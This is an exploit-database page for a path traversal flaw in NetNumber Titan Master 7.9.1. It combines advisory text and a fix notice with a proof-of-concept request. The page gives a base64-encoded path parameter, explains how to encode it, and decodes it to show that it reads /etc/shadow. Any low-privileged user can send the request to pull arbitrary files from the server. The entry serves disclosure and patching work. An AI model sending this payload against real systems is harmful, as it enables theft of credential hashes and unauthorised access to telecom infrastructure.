header-logo
Suggest Exploit
vendor:
Titan Master
by:
MobileNetworkSecurity
7.5
CVSS
HIGH
Path Traversal
22
CWE
Product Name: Titan Master
Affected Version From: 7.9.1
Affected Version To: 7.9.1
Patch Exists: YES
Related CWE: N/A
CPE: a:netnumber:titan_master
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2019

NetNumber Titan ENUM/DNS/NP – Path Traversal – Authorization Bypass

A Path Traversal issue was discovered in the Web GUI of NetNumber Titan 7.9.1. When an authenticated user attempts to download a trace file (through drp) by using a ../../ technique, arbitrary files can be downloaded from the server. Since the webserver running with elevated privileges it is possible to download arbitrary files. The HTTP request can be executed by any (even low privileged) user, so the authorization mechanism can be bypassed.

Mitigation:

Upgrade to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass
# Google Dork: N/A
# Date: 4/29/2019
# Exploit Author: MobileNetworkSecurity
# Vendor Homepage: https://www.netnumber.com/products/#data
# Software Link: N/A
# Version: Titan Master 7.9.1
# Tested on: Linux
# CVE : N/A
# Type: WEBAPP

*************************************************************************
A Path Traversal issue was discovered in the Web GUI of NetNumber Titan 7.9.1.
When an authenticated user attempts to download a trace file (through drp) by using a ../../ technique, arbitrary files can be downloaded from the server. Since the webserver running with elevated privileges it is possible to download arbitrary files.
The HTTP request can be executed by any (even low privileged) user, so the authorization mechanism can be bypassed.
*************************************************************************

Proof of Concept (PoC):

http://X.X.X.X/drp?download=true&path=Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$

The vulnerable path parameter is base64 encoded where the equal sign replaced by the dollar sign.

Original payload:
Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$

Replaced dollar signs:
Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw==

Base64 decoded payload:
//SYSTEM/system/trace?download=t&el=../../../../etc/shadow

In the HTTP response you will receive the content of the file.

*************************************************************************
The issue has been fixed in the newer version of the software.

Navigation

Suggest Exploit

Services By CQR